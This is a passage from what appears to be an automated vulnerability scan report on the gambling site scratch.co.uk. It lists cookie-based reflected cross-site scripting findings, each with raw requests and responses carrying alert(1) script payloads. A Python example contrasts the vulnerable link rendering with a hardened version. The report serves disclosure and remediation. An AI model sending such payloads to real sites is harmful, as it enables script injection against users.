Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:33 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:33 GMT; path=/
Set-Cookie: currency=GBPd0b24%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E331cb5603ba; expires=Wed, 15-Jun-2011 12:29:33 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:33 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 15139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPd0b24"><script>alert(1)</script>331cb5603ba', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.174. http://scratch.co.uk/invite-friend/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /invite-friend/

Issue detail

The value of the lang cookie is copied into a JavaScript string literal inside the javascript: URL of a double-quoted href attribute. The payload 61860"><script>alert(1)</script>93ea94dc415 was submitted in the lang cookie and was echoed unmodified in the application's response; the leading "> closes the attribute and the <a> tag, so the <script> element that follows is parsed as markup.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the tainted data arrives in a cookie, this is not trivial to exploit against another user: an attacker first needs a way to set an arbitrary cookie value in the victim's browser, which considerably mitigates the impact. The response does, however, re-issue the tainted lang value in a Set-Cookie header with a 30-day expiry, so a planted payload persists across later visits.

Request

GET /invite-friend/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG61860"><script>alert(1)</script>93ea94dc415; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:28:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:28:50 GMT; path=/
Set-Cookie: lang=ENG61860%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E93ea94dc415; expires=Wed, 15-Jun-2011 12:28:50 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:28:50 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:28:50 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG61860"><script>alert(1)</script>93ea94dc415', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.175. http://scratch.co.uk/over-18/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /over-18/

Issue detail

The value of the affiliate cookie is copied into a JavaScript string literal inside the javascript: URL of a double-quoted href attribute. The payload 94275"><script>alert(1)</script>11d8ef5060b was submitted in the affiliate cookie and was echoed unmodified in the application's response (only the %7C separators were URL-decoded); the leading "> closes the attribute and the <a> tag, so the <script> element that follows is parsed as markup.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the tainted data arrives in a cookie, this is not trivial to exploit against another user: an attacker first needs a way to set an arbitrary cookie value in the victim's browser, which considerably mitigates the impact. The response does, however, re-issue the tainted affiliate value in a Set-Cookie header with a 30-day expiry, so a planted payload persists across later visits.

Request

GET /over-18/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C24394275"><script>alert(1)</script>11d8ef5060b; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C24394275%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E11d8ef5060b; expires=Wed, 15-Jun-2011 12:26:12 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:12 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:12 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:12 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 10735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|24394275"><script>alert(1)</script>11d8ef5060b');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.176. http://scratch.co.uk/over-18/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /over-18/

Issue detail

The value of the currency cookie is copied into a JavaScript string literal inside the javascript: URL of a double-quoted href attribute. The payload 3a5e9"><script>alert(1)</script>657c0e10aea was submitted in the currency cookie and was echoed unmodified in the application's response; the leading "> closes the attribute and the <a> tag, so the <script> element that follows is parsed as markup.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the tainted data arrives in a cookie, this is not trivial to exploit against another user: an attacker first needs a way to set an arbitrary cookie value in the victim's browser, which considerably mitigates the impact. The response does, however, re-issue the tainted currency value in a Set-Cookie header with a 30-day expiry, so a planted payload persists across later visits.

Request

GET /over-18/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP3a5e9"><script>alert(1)</script>657c0e10aea;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:44 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:44 GMT; path=/
Set-Cookie: currency=GBP3a5e9%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E657c0e10aea; expires=Wed, 15-Jun-2011 12:30:44 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:44 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 10733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP3a5e9"><script>alert(1)</script>657c0e10aea', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.177. http://scratch.co.uk/over-18/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /over-18/

Issue detail

The value of the lang cookie is copied into a JavaScript string literal inside the javascript: URL of a double-quoted href attribute. The payload b2f0a"><script>alert(1)</script>260d517347e was submitted in the lang cookie and was echoed unmodified in the application's response; the leading "> closes the attribute and the <a> tag, so the <script> element that follows is parsed as markup.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the tainted data arrives in a cookie, this is not trivial to exploit against another user: an attacker first needs a way to set an arbitrary cookie value in the victim's browser, which considerably mitigates the impact. The response does, however, re-issue the tainted lang value in a Set-Cookie header with a 30-day expiry, so a planted payload persists across later visits.

Request

GET /over-18/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENGb2f0a"><script>alert(1)</script>260d517347e; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: lang=ENGb2f0a%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E260d517347e; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:01 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 10735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENGb2f0a"><script>alert(1)</script>260d517347e', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.178. http://scratch.co.uk/problem-gambling/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /problem-gambling/

Issue detail

The value of the affiliate cookie is copied into a JavaScript string literal inside the javascript: URL of a double-quoted href attribute. The payload 394d5"><script>alert(1)</script>18bf32caf70 was submitted in the affiliate cookie and was echoed unmodified in the application's response (only the %7C separators were URL-decoded); the leading "> closes the attribute and the <a> tag, so the <script> element that follows is parsed as markup.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the tainted data arrives in a cookie, this is not trivial to exploit against another user: an attacker first needs a way to set an arbitrary cookie value in the victim's browser, which considerably mitigates the impact. The response does, however, re-issue the tainted affiliate value in a Set-Cookie header with a 30-day expiry, so a planted payload persists across later visits.

Request

GET /problem-gambling/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243394d5"><script>alert(1)</script>18bf32caf70; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243394d5%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E18bf32caf70; expires=Wed, 15-Jun-2011 12:26:06 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:06 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:06 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:06 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243394d5"><script>alert(1)</script>18bf32caf70');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...
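The issue detail describes the sink precisely: a cookie value is concatenated into a single-quoted JavaScript string, inside a javascript: URL, inside a double-quoted href attribute, so a single double quote in the cookie ends the attribute. The Python model below is an added example, not the site's PHP and not Burp's code. It reproduces the vulnerable pattern visible in the response, then builds the same link the way the nested context requires: enumerated cookies (currency, lang) are validated against an allow-list, the free-form affiliate string is JS-encoded, and the finished attribute value is HTML-encoded. The allow-lists and the openScratch signature are assumptions; the page shows only GBP, USD and ENG.

```python
import html
import re

# Values copied from the report's request/response pair. The payload is
# Burp's canary-wrapped probe; the affiliate prefix is the site's real value.
AFFILIATE = "direct-173|193|214|243"
PAYLOAD = '394d5"><script>alert(1)</script>18bf32caf70'

# Assumed allow-lists: the page never shows the site's full set of currencies
# or languages, only GBP/USD and ENG, so these are illustrative.
ALLOWED_CURRENCY = {"GBP", "USD", "EUR"}
ALLOWED_LANG = {"ENG"}


def render_join_link_vulnerable(currency, lang, affiliate):
    """The pattern visible in the report: three cookie values dropped verbatim
    into a javascript: href, so a double quote in any of them ends the attribute."""
    return (
        "<a href=\"javascript:openScratch('%s', '%s', '%s');\" "
        "onclick=\"pageTracker._trackEvent('Join', 'Top Nav');\">Join</a>"
        % (currency, lang, affiliate)
    )


def js_string_literal(value):
    """Encode value as a single-quoted JavaScript string literal in which every
    non-alphanumeric UTF-16 code unit is \\uXXXX-escaped. Nothing is left that
    HTML, the URL scheme or the surrounding quotes can misinterpret."""
    units = value.encode("utf-16-be")
    out = []
    for i in range(0, len(units), 2):
        u = (units[i] << 8) | units[i + 1]
        if u < 128 and chr(u).isalnum():
            out.append(chr(u))
        else:
            out.append("\\u%04x" % u)
    return "'" + "".join(out) + "'"


def normalise_enum(value, allowed, default):
    """Enumerated inputs (currency, language) are validated, not encoded."""
    return value if value in allowed else default


def render_join_link_hardened(currency, lang, affiliate):
    """Same link, built in layers: validate the enumerations, JS-encode the
    free-form affiliate string, then HTML-encode the whole attribute value.
    Browsers entity-decode an attribute before treating it as a javascript:
    URL, so the encodings unwind in the reverse order they were applied."""
    currency = normalise_enum(currency, ALLOWED_CURRENCY, "GBP")
    lang = normalise_enum(lang, ALLOWED_LANG, "ENG")
    call = "javascript:openScratch(%s, %s, %s);" % (
        js_string_literal(currency),
        js_string_literal(lang),
        js_string_literal(affiliate),
    )
    return (
        '<a href="%s" onclick="pageTracker._trackEvent(\'Join\', \'Top Nav\');">Join</a>'
        % html.escape(call, quote=True)
    )


def href_value(link):
    """Extract and entity-decode the href, i.e. what the browser would run."""
    m = re.search(r'href="([^"]*)"', link)
    return html.unescape(m.group(1)) if m else None


if __name__ == "__main__":
    print(render_join_link_vulnerable("GBP", "ENG", AFFILIATE + PAYLOAD))
    print(render_join_link_hardened("GBP", "ENG", AFFILIATE + PAYLOAD))
```

The encoding layer is defence in depth; the real fix for a three-parameter link like this is to drop the javascript: URL altogether and pass the values through data attributes to a handler bound in script, which leaves only one context (an HTML attribute) to encode for.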

3.179. http://scratch.co.uk/problem-gambling/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /problem-gambling/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46cdc"><script>alert(1)</script>71a5e08c364 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /problem-gambling/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP46cdc"><script>alert(1)</script>71a5e08c364;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:39 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:39 GMT; path=/
Set-Cookie: currency=GBP46cdc%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E71a5e08c364; expires=Wed, 15-Jun-2011 12:30:39 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:39 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP46cdc"><script>alert(1)</script>71a5e08c364', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.180. http://scratch.co.uk/problem-gambling/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /problem-gambling/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c926"><script>alert(1)</script>9dd75eb04f8 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /problem-gambling/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG6c926"><script>alert(1)</script>9dd75eb04f8; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:40 GMT; path=/
Set-Cookie: lang=ENG6c926%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9dd75eb04f8; expires=Wed, 15-Jun-2011 12:29:40 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:40 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:40 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG6c926"><script>alert(1)</script>9dd75eb04f8', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.181. http://scratch.co.uk/promotions/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /promotions/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a0e9"><script>alert(1)</script>086149d4525 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /promotions/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C2433a0e9"><script>alert(1)</script>086149d4525; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C2433a0e9%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E086149d4525; expires=Wed, 15-Jun-2011 12:25:32 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:32 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:32 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:32 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|2433a0e9"><script>alert(1)</script>086149d4525');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.182. http://scratch.co.uk/promotions/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /promotions/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b24c5"><script>alert(1)</script>25cd645fca was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /promotions/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPb24c5"><script>alert(1)</script>25cd645fca;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:41 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:41 GMT; path=/
Set-Cookie: currency=GBPb24c5%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E25cd645fca; expires=Wed, 15-Jun-2011 12:29:41 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:41 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPb24c5"><script>alert(1)</script>25cd645fca', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.183. http://scratch.co.uk/promotions/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /promotions/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1efd1"><script>alert(1)</script>3c552cf62ce was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /promotions/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG1efd1"><script>alert(1)</script>3c552cf62ce; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:28:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
